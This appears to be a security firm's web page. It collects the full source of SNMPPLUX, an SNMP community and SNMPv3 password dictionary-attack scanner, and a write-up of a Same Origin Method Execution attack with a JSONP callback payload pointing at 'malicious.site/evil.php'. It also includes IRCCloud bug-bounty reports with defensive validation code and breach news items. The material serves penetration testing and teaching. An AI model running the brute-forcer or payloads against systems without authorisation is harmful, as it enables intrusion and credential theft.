
SNMPPLUX


Pentura continually develops new tools and scripts to improve the effectiveness of the team. One such tool, SNMPPLUX, is an offshoot of a larger development project (ORR).
SNMPPLUX is a USM-compliant SNMPv1, SNMPv2c and SNMPv3 authentication scanner powered by the pysnmp, re, sys, getopt, array, time and multiprocessing Python modules.
As well as providing SNMPv1 and v2c community dictionary attacks, it also provides username and password dictionary attacks for SNMPv3 for the following authentication types:
• SNMPv3 Auth None
• SNMPv3 Auth MD5 Priv None
• SNMPv3 Auth MD5 Priv DES
• SNMPv3 Auth SHA Priv AES128
• SNMPv3 Auth SHA Priv AES192
• SNMPv3 Auth SHA Priv AES256
• SNMPv3 Auth SHA Priv DES
• SNMPv3 Auth SHA Priv 3DES

Whilst multiprocessing is currently used to speed up testing with parallel processes the future plans. A library version of this code is also utilised as part of the ORR project.
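The SNMPv3 MD5 and SHA checks above rely on pysnmp turning each candidate password into a USM key. This added example (not part of SNMPPLUX or pysnmp) re-implements the RFC 3414 password-to-key and key localisation steps with the RFC's own test vector, to show why passphrases below 8 octets are rejected and why the derived key is different for every agent's engineID:

```python
import hashlib

# RFC 3414 A.2: the passphrase is repeated until 1,048,576 octets have been hashed.
_STRETCH_OCTETS = 1024 * 1024


def password_to_key(password, hash_name):
    """Ku = H(passphrase repeated to 1 MiB); hash_name is 'md5' (usmHMACMD5) or 'sha1' (usmHMACSHA)."""
    if len(password) < 8:
        raise ValueError("USM passphrases must be at least 8 octets")
    reps, rem = divmod(_STRETCH_OCTETS, len(password))
    return hashlib.new(hash_name, password * reps + password[:rem]).digest()


def localize_key(ku, engine_id, hash_name):
    """Kul = H(Ku || snmpEngineID || Ku): the key actually used for HMAC and privacy."""
    return hashlib.new(hash_name, ku + engine_id + ku).digest()


def usm_localized_key(password, engine_id, hash_name="md5"):
    """Full derivation from a plaintext passphrase to the engine-specific key."""
    return localize_key(password_to_key(password, hash_name), engine_id, hash_name)


# RFC 3414 appendix A.3 test vector: passphrase "maplesyrup", engineID 00..02.
RFC3414_PASSWORD = b"maplesyrup"
RFC3414_ENGINE_ID = bytes.fromhex("000000000000000000000002")

if __name__ == "__main__":
    for name in ("md5", "sha1"):
        print(name, usm_localized_key(RFC3414_PASSWORD, RFC3414_ENGINE_ID, name).hex())
    # A different engineID yields a different localised key from the same passphrase,
    # which is why credentials have to be re-derived (pysnmp does this) per target.
    other = usm_localized_key(RFC3414_PASSWORD, bytes.fromhex("000000000000000000000003"))
    print("md5 on another engine", other.hex())
```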

[Screenshot showing example operation]

The current source code for this tool is included below on an as-is basis. It may need to be reformatted to remove syntax and indenting errors introduced by providing the source in this format. Please see the License/Disclaimer below before using this software.

The source can also be downloaded from github:

https://github.com/PenturaLabs/SNMPPLUX

-----------------------snmpplux0.3.py source--------------------------------
from pysnmp.hlapi import *
import re
import sys, getopt
from array import *
import time
from multiprocessing import Pool


def banner():
    print('.')
    print(r' /   _____/ \      \    /     \______    \______   \    |   |    |   \   \/  /')
    print(r' \_____  \  /   |   \  /  \ /  \|     ___/|     ___/    |   |    |   /\     / ')
    print(r' /        \/    |    \/    Y    \    |    |    |   |    |___|    |  / /     \ ')
    print(r'/_______  /\____|__  /\____|__  /____|    |____|   |_______ \______/ /___/\  \ ')
    print(r'        \/         \/         \/                           \/              \_/')
    print(' ')
    print('Liam Romanis')
    print('version 0.3b - beta testing')
    print('http://www.pentura.com')
    print('.')


def opts(argv):
    """Parse -i <targets file> -u <usernames file> -p <passwords file>; all three are required."""
    inputfile = ''
    userfile = ''
    passfile = ''
    usage = '%s -i <inputfile> -u <userfile> -p <passfile>' % sys.argv[0]
    try:
        opts, args = getopt.getopt(argv, 'i:u:p:h', ['ifile=', 'ufile=', 'pfile=', 'help'])
    except getopt.GetoptError:
        print(usage)
        sys.exit(2)
    for opt, arg in opts:
        if opt in ('-h', '--help'):
            print(usage)
            sys.exit()
        elif opt in ('-i', '--ifile'):
            inputfile = arg
        elif opt in ('-u', '--ufile'):
            userfile = arg
        elif opt in ('-p', '--pfile'):
            passfile = arg
    if not (inputfile and userfile and passfile):
        print(usage)
        sys.exit(2)
    return inputfile, userfile, passfile


# Every check below performs a single GET of sysDescr.0. A reply with neither an
# errorIndication (timeout, unknown user, wrong key) nor an errorStatus means the
# agent accepted the supplied credentials.

def snmp1dict(ip, comm):
    # mpModel=0 selects SNMPv1
    errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
        SnmpEngine(), CommunityData(comm, mpModel=0), UdpTransportTarget((ip, 161)),
        ContextData(), ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
    if not errorIndication and not errorStatus:
        print("SNMPv1: %s: Community:%s" % (ip, comm))


def snmp2dict(ip, comm):
    # CommunityData defaults to mpModel=1, i.e. SNMPv2c
    errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
        SnmpEngine(), CommunityData(comm), UdpTransportTarget((ip, 161)),
        ContextData(), ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
    if not errorIndication and not errorStatus:
        print("SNMPv2: %s: Community:%s" % (ip, comm))


def snmp3_authNone_privNone(ip, user):
    # UsmUserData with only a user name is a noAuthNoPriv request
    errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
        SnmpEngine(), UsmUserData(user), UdpTransportTarget((ip, 161)),
        ContextData(), ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
    if not errorIndication and not errorStatus:
        print("SNMPv3 Auth None Priv None: %s: %s - no pass required\n" % (ip, user))


def snmp3_authMD5_privNone(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        # UsmUserData(user, authKey) defaults to HMAC-MD5 authentication, no privacy
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
            SnmpEngine(), UsmUserData(user, passwd), UdpTransportTarget((ip, 161)),
            ContextData(), ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if not errorIndication and not errorStatus:
            print("SNMPv3 Auth MD5 Priv None: %s: %s:%s" % (ip, user, passwd))
    except Exception:
        print('exception caused by: %s:%s' % (user, passwd))


def snmp3_authMD5_privDES(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        # the same passphrase is tried as both auth and priv key; defaults are MD5 / DES
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
            SnmpEngine(), UsmUserData(user, passwd, passwd), UdpTransportTarget((ip, 161)),
            ContextData(), ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if not errorIndication and not errorStatus:
            sys.stdout.flush()
            print("SNMPv3 Auth MD5 Priv DES: %s: %s:%s" % (ip, user, passwd))
    except Exception:
        print('exception caused by: %s:%s' % (user, passwd))


def _snmp3_sha(ip, user, passwd, privProtocol, label, privName):
    """Shared body of the HMAC-SHA checks: auth SHA with the given privacy protocol."""
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
            SnmpEngine(),
            UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=privProtocol),
            UdpTransportTarget((ip, 161)), ContextData(),
            ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if not errorIndication and not errorStatus:
            print("SNMPv3 Auth SHA Priv %s: %s: %s:%s:auth:usmHMACSHAAuthProtocol:priv:%s"
                  % (label, ip, user, passwd, privName))
    except Exception:
        print('exception caused by: %s:%s:usmHMACSHAAuthProtocol:%s' % (user, passwd, privName))


def snmp3_authSHA_privAES128(ip, user, passwd):
    _snmp3_sha(ip, user, passwd, usmAesCfb128Protocol, 'AES128', 'usmAesCfb128Protocol')


def snmp3_authSHA_privAES192(ip, user, passwd):
    _snmp3_sha(ip, user, passwd, usmAesCfb192Protocol, 'AES192', 'usmAesCfb192Protocol')


def snmp3_authSHA_privAES256(ip, user, passwd):
    _snmp3_sha(ip, user, passwd, usmAesCfb256Protocol, 'AES256', 'usmAesCfb256Protocol')


def snmp3_authSHA_privDES(ip, user, passwd):
    _snmp3_sha(ip, user, passwd, usmDESPrivProtocol, 'DES', 'usmDESPrivProtocol')


def snmp3_authSHA_priv3DES(ip, user, passwd):
    _snmp3_sha(ip, user, passwd, usm3DESEDEPrivProtocol, '3DES', 'usm3DESEDEPrivProtocol')


# Pool.map needs a single-argument, picklable callable per job; these unpack the tuples.
def snmp12_helper(args):
    return snmp1dict(*args), snmp2dict(*args)


def snmp3none_helper(args):
    return snmp3_authNone_privNone(*args)


def snmp3md5none_helper(args):
    return snmp3_authMD5_privNone(*args), snmp3_authMD5_privDES(*args)


def snmp3shaaes_helper(args):
    return (snmp3_authSHA_privAES128(*args), snmp3_authSHA_privAES192(*args),
            snmp3_authSHA_privAES256(*args), snmp3_authSHA_privDES(*args),
            snmp3_authSHA_priv3DES(*args))


if __name__ == "__main__":
    banner()
    inputfile, userfile, passfile = opts(sys.argv[1:])

    with open(inputfile, "r") as ins:
        targs = [line.rstrip("\n") for line in ins]

    with open(userfile, "r") as ins:
        users = [line.rstrip("\n") for line in ins]

    # USM passphrases must be at least 8 octets, so shorter candidates are skipped
    with open(passfile, "r") as ins:
        passwords = [line.rstrip("\n") for line in ins if len(line.rstrip("\n")) >= 8]

    # community string candidates for v1/v2c are read from dict.txt in the working directory
    with open("dict.txt", "r") as ins:
        communities = [line.rstrip("\n") for line in ins]

    p = Pool(20)
    job1_args = [(ip, comm) for comm in communities for ip in targs]
    p.map(snmp12_helper, job1_args)
    job2_args = [(ip, user) for user in users for ip in targs]
    p.map(snmp3none_helper, job2_args)  # (ip, user) tuples, not the community list
    job3_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords]
    p.map(snmp3md5none_helper, job3_args)
    p.map(snmp3shaaes_helper, job3_args)  # same (ip, user, passwd) combinations
    p.close()
    p.join()

—————————————————————————–

LICENSE

Copyright ©2016 Pentura Ltd. This copyright applies to the Pentura codebase as a whole, or any individual distributed application. The individual contributions of government employees, which may be identified on a per-file basis are in the public domain. The software and content provided on this website are made available under the terms of the Apache License, Version 2.0. A copy of the License is available at:     http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

DISCLAIMER

THIS SOFTWARE AVAILABLE ON THE SITE http://www.pentura.com IS PROVIDED “AS IS” AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Pentura Ltd, OR ANY OF THEIR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Without limiting the foregoing, Pentura Ltd make no warranty that:
• the software will meet your requirements.
• the software will be uninterrupted, timely, secure or error-free.
• the results that may be obtained from the use of the software will be effective, accurate or reliable.
• the quality of the software will meet your expectations.
• any errors in the software obtained from the OpenSHA.org web site will be corrected.

Software and its documentation made available on the http://www.pentura.com web site:
• could include technical or other mistakes, inaccuracies or typographical errors. Pentura contributors may make changes to the software or documentation made available on its web site.
• may be out of date and Pentura and its contributors make no commitment to update such materials.

Pentura, and its contributors, assume no responsibility for errors or omissions in the software or documentation available from the http://www.pentura.com web site.
In no event shall Pentura, or its contributors be liable to you or any third parties for any special, punitive, incidental, indirect or consequential damages of any kind, or any damages whatsoever, including, without limitation, those resulting from loss of use, data or profits, whether or not Pentura and its contributors have been advised of the possibility of such damages, and on any theory of liability, arising out of or in connection with the use of this software. The use of the software downloaded through the http://www.pentura.com site is done at your own discretion and risk and with agreement that you will be solely responsible for any damage to your computer system or loss of data that results from such activities. No advice or information, whether oral or written, obtained by you from Pentura, its website or its contributors shall create any warranty for the software.

Finding and Exploiting Same Origin Method Execution vulnerabilities

Recently it came to my attention that it is possible to abuse JSONP callbacks using a vulnerability known as SOME (Same Origin Method Execution), which an attacker can use to abuse the trust between a user, the web application and its intended flow of execution. For example, using the SOME attack an attacker can trick a user into visiting a malicious web page that contains a link to the host web application's API with a JSONP callback parameter under the attacker's control.

An example of this would be as follows:
http://example.com/api/get_user.json?id=1&callback=logResults

The above URL could be an example of a method for a third-party to obtain user accounts associated with the user ID 1 and would return something similar to the following:
logResults({"username": "admin", "email_address":"test@example.com"});

However, using the SOME attack it is possible to change the callback function to anything that JavaScript or the API recognises, for example:
http://example.com/api/get_user.json?id=1&callback=window.open('http://malicious.site/evil.php');//

Which would return something similar to the following:
window.open('http://malicious.site/evil.php');//({"username": "admin", "email_address":"test@example.com"});

With this example, the above URL would open a window from the user's browser and direct it to http://malicious.site/evil.php (the trailing // comments out the rest of the response so it is never parsed), which could hook the user's browser with a persistent XSS framework such as BeEF or similar.

Many web applications rely on the Same Origin Policy, which attempts to prevent pages or resources from being loaded from external origins. This attack bypasses it in two ways. First, JSONP (JSON with Padding) is expected to be used cross-origin, because that is what it was designed for. Second, every call to the resource is loaded from the same origin, so the request is never caught by the Same Origin Policy.

Whilst performing some testing with this vulnerability, I found that it was also possible to abuse it remotely by bypassing the Same Origin Policy with a few tricks, such as loading the affected URL directly from an <img src=""> tag or a <script> tag, which the Same Origin Policy does not prevent. This allows an attacker to perform a virtually unlimited number of actions on the application in the context of the unsuspecting victim user. These actions could range from stealing personal images, releasing data and stealing cookies to simply performing malicious acts such as infecting the user with BeEF.

During this research I found that most major websites, including those of Microsoft, Facebook and Google, are vulnerable to this type of attack. The one thing they all have in common is open-source JavaScript frameworks such as jQuery, PrototypeJS and AngularJS. These frameworks appear to allow the SOME vulnerability to be present without any (easy) way of removing the functionality.

SOME Example
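The defence on the server side is to never reflect the callback parameter verbatim. This added example (not from the post) shows the reflecting pattern described above beside a hardened JSONP renderer that restricts the callback to a plain identifier and pins the content type; the sample record and both callbacks are the post's own examples, and the function names are mine.

```python
import json
import re

# A JSONP callback may only be a JavaScript identifier, optionally dotted
# (e.g. "logResults" or "app.handlers.logResults"); nothing else is reflected.
_SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")
_MAX_CALLBACK_LEN = 64


def callback_is_safe(callback):
    """True only for a bounded, identifier-shaped callback name."""
    return len(callback) <= _MAX_CALLBACK_LEN and _SAFE_CALLBACK.match(callback) is not None


def render_jsonp_unsafe(callback, data):
    """The pattern the post describes: the callback parameter is reflected verbatim."""
    return "%s(%s);" % (callback, json.dumps(data))


def render_jsonp(callback, data):
    """Hardened variant: validate the callback and pin the response content type."""
    if not callback_is_safe(callback):
        raise ValueError("rejected JSONP callback: %r" % callback)
    # The leading comment defeats content sniffing of the script body, and the
    # headers stop the response being interpreted as anything but JavaScript.
    body = "/**/%s(%s);" % (callback, json.dumps(data))
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return body, headers


# Constructed sample, taken from the post's example record and its two callbacks.
SAMPLE_USER = {"username": "admin", "email_address": "test@example.com"}
GOOD_CALLBACK = "logResults"
EVIL_CALLBACK = "window.open('http://malicious.site/evil.php');//"

if __name__ == "__main__":
    print(render_jsonp_unsafe(EVIL_CALLBACK, SAMPLE_USER))  # attacker JS reflected
    print(render_jsonp(GOOD_CALLBACK, SAMPLE_USER)[0])
    try:
        render_jsonp(EVIL_CALLBACK, SAMPLE_USER)
    except ValueError as exc:
        print(exc)
```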

[IRCCloud] History and Another XSS Bug Bounty

Personally, I have been a user of IRC since 2004 on some private networks and some other well-known ones such as Freenode. However, it was always inconvenient to have to set up an IRC Bouncer, so when IRCCloud came around, I was excited to try it and see if it provided me with a method of staying connected to all the required networks without having to download a new client on every computer I was on (as it’s a web service).

After trying the Beta which was a free option before they publicly released the paid version, I thought I’d try and find some vulnerabilities to report to them – for no other reason than to ensure that the service that I am using can’t be exploited to disclose any of my information or data.

The first issue I identified was in the application's pastebin feature: when the user pastes a large amount of text, they get the option of uploading it to IRCCloud's own proprietary pastebin service.

IRCCloud Pastebin

However, after performing some testing to execute JavaScript within the resulting pastebin link, I found that it was possible to insert a new line (\n) followed by a Cross Site Scripting payload, which executed, giving full pre-authenticated persistent Cross Site Scripting.

Read the full report on HackerOne.

[IRCCloud] Inadequate input validation on API endpoint leading to self denial of service and increased system load

So, as you do, I was just looking around, manually fuzzing some WebSocket requests to see if I could get any sort of XSS, remote IRC command injection or SQLi mainly; it turned out that I didn't find much there that was worth noting. So I started checking whether their logic was all right. One of their requests looked similar to:

{"_reqid":1234, "cid":5678, "to": "#treehouse", "msg":"test", "method":"say"}

I thought, all right, what if I can send a message to multiple channels? So I changed the "to" parameter to be an array: "to":["#treehouse", "#darkscience"]. Then all of a sudden my account got disabled. So I booted up irssi and jumped onto the support channel to speak to the security engineers there. RJ (the one I spoke to) confirmed that the request put my account into an infinite loop attempting to send to a string-type channel when an array had been given. This started filling up the internal queues and increasing the RAM usage. He then fixed the issue with some difficulty. I submitted it to HackerOne as a report just so they had a record of it.

With some further discussion with RJ and James (another IRCCloud security engineer), it emerged that it would have been possible to create multiple "test accounts", which would have been propagated to the other servers, and perform the attack across those accounts, which in turn may have brought down the servers due to a lack of disk space or other resources.

IRCCloud were brilliant in dealing with the report, and the timely responses from James, even out of working hours, were by far the best I had ever seen. *tilts hat to James*

Here is the full report issued to IRCCloud on HackerOne.
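The fix for this class of bug is to validate the type of every field before the request is queued. This added example (not IRCCloud's code) validates the "say" request quoted above against an explicit schema and rejects the array-valued "to" that caused the loop; the schema and function name are my assumptions based on the post's sample message.

```python
import json

# Expected shape of the "say" request quoted in the post (constructed from it).
SAY_SCHEMA = {"_reqid": int, "cid": int, "to": str, "msg": str, "method": str}


def validate_say_request(raw):
    """Return (ok, errors) for one websocket frame; reject it before it reaches a queue."""
    errors = []
    try:
        req = json.loads(raw)
    except ValueError as exc:
        return False, ["invalid JSON: %s" % exc]
    if not isinstance(req, dict):
        return False, ["request must be a JSON object"]
    for field, expected in SAY_SCHEMA.items():
        if field not in req:
            errors.append("missing field %r" % field)
        # bool is a subclass of int in Python, so exclude it explicitly for int fields
        elif not isinstance(req[field], expected) or isinstance(req[field], bool):
            errors.append("field %r must be %s, got %s"
                          % (field, expected.__name__, type(req[field]).__name__))
    for extra in sorted(set(req) - set(SAY_SCHEMA)):
        errors.append("unexpected field %r" % extra)
    if not errors and req["method"] != "say":
        errors.append("unsupported method %r" % req["method"])
    if not errors and not req["to"]:
        errors.append("field 'to' must not be empty")
    return not errors, errors


# Constructed frames: the post's original request and the array variant it describes.
GOOD_FRAME = '{"_reqid":1234, "cid":5678, "to": "#treehouse", "msg":"test", "method":"say"}'
BAD_FRAME = '{"_reqid":1234, "cid":5678, "to": ["#treehouse", "#darkscience"], "msg":"test", "method":"say"}'

if __name__ == "__main__":
    print(validate_say_request(GOOD_FRAME))
    print(validate_say_request(BAD_FRAME))
```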

Most businesses do not understand data breach risks


Research by HP has uncovered a lack of understanding among businesses of the risks associated with data breaches. More than 70% of US and UK executives surveyed by the Ponemon Institute said that their organisation does not understand fully the dangers of breaches, while less than half of top executives and board members are kept informed about the response process.

The 2014 Executive Breach Preparedness Research Report was designed to highlight the importance of senior executive involvement in the response to data breaches. While 79% of the nearly 500 senior executives polled agreed that executive-level involvement in the response process was necessary for a successful resolution, only 45% said that they were accountable for the process. The research also found that most executives are more concerned about threats from within their business than about external attacks.

As we discussed last week, the financial cost of data breaches can be huge, not to mention the revenue lost through reputational damage. This is why direction and leadership are needed from those at the top. Executives need to be aware of and actively involved in the data breach response process, and there needs to be a clear plan in place to prevent security incidents from escalating into a complete disaster for the company.

The Ponemon Institute noted that senior executives and board members may have been complacent about the effects of cyber-attacks and data breaches in the past, but are now gradually realising the damaging costs of such incidents. This is welcome news and we hope that senior executives will continue to take a more active role in their response to data breaches, educating themselves and their staff about the risks and start investing in the best security technology available.

Research Reveals Cost of Online Fraud to UK


This week has been Get Safe Online Week and to coincide with the event, the National Fraud Intelligence Bureau researched cyber-crime in the UK. The research found that over the last year, the ten biggest online scams cost victims over £670m – although the actual figure is thought to be significantly higher than that due to unreported crimes.

A separate poll found that while over half of Britons have been a victim of online fraud, ID theft, hacking or online abuse, only a third of them reported the crime. One of the reasons for this is that many people did not know how to report it. It is hoped that this will improve with the development of Action Fraud, the UK's national fraud reporting centre, and the increasing resources that the Government is dedicating to cyber-crime.

The research also suggests that cyber-crime is increasingly being taken more seriously by the British public. Around 53% said they now see it as a serious “physical world” crime and 42% stated that they are now more vigilant when shopping online. Despite this change in attitude, many people are still failing to take basic security measures with 67% of tablet owners and 54% of mobile phone owners in the survey not having a password or PIN to secure their device.

It's good to see that initiatives like Get Safe Online Week and Action Fraud are raising awareness of online crime and what people can do to prevent it. However, this research is a stark reminder of the dangers that we all face online. Online fraud continues to increase while crime overall falls, with criminals constantly developing new ways of targeting victims online.

At Pentura we believe that education is the key in the fight against cyber-crime. Our LearnwithPentura e-learning portal provides users with advice on security and best practice, with eight online modules ranging from email to removable media. Complacency is not an option, and businesses and authorities must continue to raise awareness of the dangers of online crime and educate users in cyber security.

Kmart hit by card hack attack


It’s been revealed that a data breach at US retail chain Kmart that compromised card details lasted over a month. The discount department store said that the malware was discovered last week but had been operating since early September. Based on its investigation so far, the company said that it believes credit and debit cards were exposed but that no personal information, PIN numbers, email addresses or social security numbers were accessed.

The incident is the latest in a string of cyber-attacks on American retailers. Last week, restaurant chain Dairy Queen revealed that hackers had stolen names, card numbers and expiration dates of around 600,000 cards across 395 of its restaurants. There have also been huge recent attacks on Home Depot, in which 56 million cards were affected, and on Target, where 40 million cards were compromised in the run-up to Christmas 2013.

It’s not thought that the breached information is being used to create counterfeit cards or encumber customers with bills for items that they haven’t bought. Nevertheless, the attack is a reminder and a warning to retailers that the sheer size of their computer networks makes them an attractive target to hackers. By improving detection times, large chains will reduce the damage caused by such breaches and better protect both their customers and their reputation.
